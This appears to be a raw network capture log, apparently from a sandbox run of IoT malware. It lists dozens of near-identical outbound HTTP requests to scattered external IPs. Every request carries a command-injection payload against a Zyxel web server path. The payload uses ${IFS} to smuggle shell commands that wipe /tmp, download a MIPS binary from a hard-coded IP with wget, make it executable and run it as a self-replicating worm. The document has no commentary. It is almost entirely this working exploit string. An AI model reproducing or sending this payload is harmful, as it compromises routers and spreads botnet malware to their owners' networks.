                        Mar 12, 2024 08:50:27.036626101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        886192.168.2.145150638.184.181.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036691904 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        887192.168.2.1452064184.173.156.210443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036736012 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        888192.168.2.1453226138.187.86.219443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036773920 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        889192.168.2.145391418.115.221.123443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036825895 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        890192.168.2.145182674.42.158.159443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036863089 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        891192.168.2.145335878.113.241.156443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036885977 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        892192.168.2.145562473.91.206.210443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036922932 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        893192.168.2.1446184142.0.17.155443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.036992073 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        894192.168.2.145307281.0.248.224443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037028074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        895192.168.2.145648488.219.30.239443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037081957 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        896192.168.2.143939224.251.100.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037127018 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        897192.168.2.1436348140.247.158.55443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037172079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        898192.168.2.1441930121.199.77.224443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037189960 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        899192.168.2.1439098198.144.22.196443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037254095 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        900192.168.2.1455120134.181.209.137443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037296057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        901192.168.2.1454232177.233.196.221443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037348986 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        902192.168.2.1447424200.182.222.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037403107 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        903192.168.2.1447098218.240.205.196443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037422895 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        904192.168.2.1454784112.132.123.47443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037467003 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        905192.168.2.143549665.188.148.13443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037532091 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        906192.168.2.144114497.17.163.114443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037561893 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        907192.168.2.1436396152.56.88.167443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037626982 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        908192.168.2.145031499.243.130.147443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037661076 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        909192.168.2.144298034.238.147.195443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037722111 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        910192.168.2.1446136159.2.150.37443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037763119 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        911192.168.2.1432922146.44.151.232443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037813902 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        912192.168.2.1444512164.119.253.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037883043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        913192.168.2.1459598200.112.61.177443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037925005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        914192.168.2.1436086166.157.77.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.037971973 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        915192.168.2.1441196147.68.202.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038018942 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        916192.168.2.1442046159.58.68.176443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038084030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        917192.168.2.1447728217.97.192.227443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038120031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        918192.168.2.144788043.53.179.142443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038156033 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        919192.168.2.144807876.94.242.196443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038213015 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        920192.168.2.1436320204.129.123.183443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038229942 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        921192.168.2.1437504108.136.185.142443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038290024 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        922192.168.2.1457122120.131.13.74443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038352013 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        923192.168.2.1433386131.208.22.221443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038398981 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        924192.168.2.1437040206.57.164.185443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038446903 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        925192.168.2.144977063.15.7.97443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038491011 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        926192.168.2.1445512114.0.165.197443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038561106 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        927192.168.2.144812477.194.198.163443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038589954 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        928192.168.2.1459260125.204.35.192443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038657904 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        929192.168.2.144492446.253.133.141443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038687944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        930192.168.2.1451830101.14.240.56443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038762093 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        931192.168.2.1450794221.86.205.141443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038820982 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        932192.168.2.1439334146.210.32.145443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038866997 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        933192.168.2.1445110218.48.207.91443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038898945 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        934192.168.2.1453182146.79.56.52443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038960934 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        935192.168.2.1436344154.61.119.100443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.038996935 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        936192.168.2.1439082137.152.15.81443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039051056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        937192.168.2.1451086158.12.91.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039082050 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        938192.168.2.1446176118.24.39.73443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039127111 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        939192.168.2.1460434120.157.234.140443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039203882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        940192.168.2.1443370139.37.215.87443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039232969 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        941192.168.2.1438260151.111.87.74443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039266109 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        942192.168.2.1435630175.243.164.71443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039311886 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        943192.168.2.145071277.152.251.98443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039347887 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        944192.168.2.1444324102.54.13.148443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039382935 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        945192.168.2.1457042147.184.131.65443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039413929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        946192.168.2.1435860223.110.138.108443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039491892 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        947192.168.2.143307448.252.223.161443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039530993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        948192.168.2.1446918183.132.27.193443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039568901 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        949192.168.2.1440460198.113.20.133443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039623976 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        950192.168.2.144670492.67.226.7443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039649963 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        951192.168.2.145256065.226.21.136443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039680004 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        952192.168.2.1437772205.47.18.91443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039733887 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        953192.168.2.1453410115.203.147.155443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039783955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        954192.168.2.1448578180.19.181.43443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:27.039814949 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        955192.168.2.1442086107.18.177.230443
                        TimestampBytes transferredDirectionData
